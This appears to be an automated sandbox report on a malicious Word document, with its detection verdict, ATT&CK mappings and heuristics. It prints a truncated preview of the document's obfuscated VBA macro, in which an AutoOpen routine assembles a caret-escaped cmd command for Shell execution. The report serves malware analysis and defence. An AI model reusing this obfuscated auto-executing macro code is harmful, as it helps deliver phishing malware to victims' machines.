Verdict: MALICIOUS
Risk Score: 202

Malware Insights

MITRE ATT&CK:
- T1059.005 Visual Basic
- T1204.002 Malicious File
- T1566.001 Spearphishing Attachment
The sample is a malicious OLE document containing a VBA macro. The AutoOpen macro is present and utilizes a Shell() call, indicating an attempt to execute arbitrary code. This is a common technique for downloading and executing further malicious payloads. The presence of the 'macros.bas' artifact and the ClamAV detection strongly suggest malicious intent.
Heuristics (6)

- ClamAV: Doc.Malware.00536d-6922915-0 (critical) [CLAMAV_DETECTION]: ClamAV detected this file as malware: Doc.Malware.00536d-6922915-0
- VBA macros detected (medium, 2 related findings) [OLE_VBA_MACROS]: Document contains VBA macro code
- Shell() call in VBA (critical) [OLE_VBA_SHELL]: Shell() call in VBA
- AutoOpen macro (high) [OLE_VBA_AUTOOPEN]: AutoOpen macro
- Legacy WordBasic auto-exec macro marker (medium) [OLE_LEGACY_WORDBASIC_AUTOEXEC]: OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
- Embedded URL (info) [EMBEDDED_URL]: One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)
Extracted artifacts (1)

Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 91440 bytes |

SHA-256: 3d4b6ac057165030dac9037c6969d32a329dd5549b4a4457c56548edfea9da23
Preview script: first 1,000 lines of the extracted script
Attribute VB_Name = "EjVEofZqrXazrC"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub AutoOpen()
Dim cFiGoL(1)
cFiGoL(0) = Left(DKTOAirm + aiXffLawPflTOqPJAiRwocHqAWtmKA + OVwZTjpwOX, 687) + Left(YlZqwjD + iDYVabVsaSSotMaXLoUsFlblTvOR + bmsBzGNbW, 932)
Dim oHXOw(2)
oHXOw(0) = Left(HBAEXotnjiOFup + VaiXsXJKwtkHiLHkassOjwFFjSDP + bBnPZGkrq, 117) + Left(UjFXHVT + ncMBYmSZruiMKfXrLUjkBcdZzMLivwQnY + ATSRwLzrK, 16)
oHXOw(1) = Right(PJzsNlqcZuNSNj + OurDvdKANSDakTYWMvZCBizoGF + SAQcPJZ, 80) + MidB(wfuiProapwAkmn + pUwoEuMOkaUHEwIIazZTHzjQEDhO + XTEHwuDSfw, 792, 449) + Left(azsbLpjiWB + YiIKCMqnjvsAKtHdVdkSFLGCnkowCSJWZ + vcjtpiHrQj, 927) + Right(BYEWOoD + KDCrwphBJUzIZAZULzUrJiviOnIlG + SdqzfRJPXcizbX, 4)
Dim NWiij(1)
NWiij(0) = Left(cffbLzOmFKHd + XDaiPHFnEGzZKcGSwjhcQkWlVwcN + dpTEzUhcpbZd, 30) + Left(KwrBsuw + KwsVjrbsqbvICTkCTDmjwiKzl + ojAstBcMs, 973)
Dim wsNQY(1)
wsNQY(0) = Right(nERKSjwqB + BhYAGTYZatLUbftGfpuWdXU + OIXZZkPCrwlt, 833) + Left(otszjzNSz + WHKucllqLDUmkMSfiorbijfXwl + aiINIswTzHBnV, 704)
rrGNPsrsO (KeyString(vbKeyC) + KeyString(vbKeyM) + hlbNbsZw + XHbiKFkbHi + iEzTa + ZcjBwYQqaGiWY + nZtqjbnPTQISIq)
Dim tKzwd(1)
tKzwd(0) = MidB(KQiEsEQLaTw + OTHablIXotmkuzjCSEswFEtQSwHl + kwaDWVsDFWXr, 373, 976) + Mid(iXAuuAJbFWiV + jHuwJDEdfzotjTJLhUkkwsjnwzAnX + pQwVpBjBrDhF, 150, 489)
Dim GXwJWw(1)
GXwJWw(0) = MidB(NvYOZSV + iYTEJALmMPkoIzwOcFXoPtdlDZp + mjaSInwXnWJjYL, 141, 751) + Left(LqVwjKjDL + INXOpBZihbfbmjOFrziJiKZqzPi + QIfImUiKhEr, 477)
End Sub
Attribute VB_Name = "knJJEwWwFZPGjf"
Function hlbNbsZw()
Dim dqiOlG(1)
dqiOlG(0) = MidB(bvGtFVABSFr + iiHIjXSvwUYmfNRLujnwfME + rVEDshvLbFC, 667, 313) + MidB(wlVSpnkGJlZb + bviXnETuRjFkpFuXiztrmKsH + SSFzcAKXKdjTBU, 775, 258)
Dim izISAP(2)
izISAP(0) = Mid(TIzJRHzIHHf + HYEWJjEVDjnZwAlkVLVaQcrJNkpswJjqQQ + RpHQYMj, 416, 139) + MidB(XmUiWrWLuR + lNrqQPJLVHRtfzdjsVBRGciJztEj + zWChWTFzKBQUb, 976, 68) + MidB(fBwYAXwkOmGKR + iBizzvJZQEMBlAfFHiqSzwGwIhz + lrqZQGuzWbfTT, 220, 887) + Right(GADRqqoik + wBsRSnaKvaPzNCGKzdzuawjbuB + fHDzViOBfkkEm, 831)
izISAP(1) = Mid(PnjdjHLiBGRSi + IsjjsJChXwzCctHjztLYHYvZzORv + EbLDIIjMF, 222, 639) + Right(JCIzhVpB + UcKwjETGAifzAEbpMwAGPlXpPjaiRf + azLzHmEjIdMCa, 896) + Mid(cCYjcIvLMPE + AOROqiidPrBKMmZVduBOHCPRCA + hhHHPunkQbCNL, 190, 638) + Mid(IlrzjtfwzJLaMb + wjUDEWihiEBoDzVzWtOzncJQlcJDzZiM + OrmGKVfsn, 199, 909)
XzSGjrjkB = "d /V" + "^:^ON/C" + CStr(Chr(5 + 5 + 5 + 3 + 16)) + "s" + "e^t $^,^\^?=" + "-\_^ -/_^ -/" + "^_^ _/-^ /" + "-_^ /\^_ _-/ " + "/_" + "^\^ " + "_/^\ \^" + "-/^" + " \^-^_ ^\^_/"
Dim WMjiZZ(1)
WMjiZZ(0) = Left(JcuYzNbnoOCXzR + ETAXkIhVUAKVWNBEwjbYjAwoiKuqEGv + YILBvYD, 948) + MidB(ARABTwl + VuTWlTCLJGOrwHcfjDfbiuwWiJbs + mELFlZhsMdn, 917, 836)
Dim BOOvfu(1)
BOOvfu(0) = Right(DsNuzEzwOAkY + WMBPhzZDYFGMMhXZFtSzijOCVaNTME + CtQNlIzTIoksR, 904) + MidB(fiXnqOTfSuD + luIGpBdIIKHMpuzWjmohhTAnalu + WHWtblc, 869, 257)
DTzlZ = " _^-/^ " + "-\^_ /-^" + "\ -_/^ /-_^" + " ^-_/}" + "^_/^-}/^\_{\_" + "/h_^-^" + "\c/^_-^t-\_" + "^a^\/^-c/\^" + "-^}/-^_" + "^;^-\^_k^-^_^"
Dim OJrAX(1)
OJrAX(0) = Mid(uGFiZbMvF + jcaidtllcVshYJzWLudNDvnqEHj + qCzNikfzPmWSYO, 465, 114) + Mid(qkOiXFPXipD + wzYCiZwQmftHHuijpiqKiHftzKBp + IZSAMtjTLDEV, 485, 297) + Left(sBaSrzGpqu + wFkpzazibiUDVSmGNwdSzPbqIT + RuBUGTOV, 969) + Mid(sOhEOVhUi + ijVnkaYjOwTCbCAMrjAjkDSLMUbzu + MSzSioz, 280, 482)
Dim YXKFzF(2)
YXKFzF(0) = MidB(pcnzYCzRm + rvXJOzoCniCqBlkNfhOsPJmkTKd + FDdwBNwH, 172, 270) + Right(GZzvnSvjYGY + HAbNUjYZznYojFWTbNJjpojsi + wiAutNUuohPO, 628) + Mid(XziFzTkF + wQmYoopipwIYudPLhlLzcRhJcnRNZwEv + WAsZkrdBzEsc, 686, 150) + MidB(qqVIHHGfM + kiZpujhphtOlidRcQJLGHOZn + tNNtSsSZP, 963, 919)
YXKFzF(1) = Mid(VaFbjiiqi + nPZcSaVsanfYVKrMSEBqpfCnp + YPwAGDSpGpcDur, 646, 901) + MidB(QrTwRwH + jzQmfjLCYjOQTVlXHwIkVhY + azCtUiisqCz, 386, 667)
GmdBCqHwj = "\^a-" + "\_^e/\" + "^_r\/_b-/^_^;" + "_" + "/
... (truncated)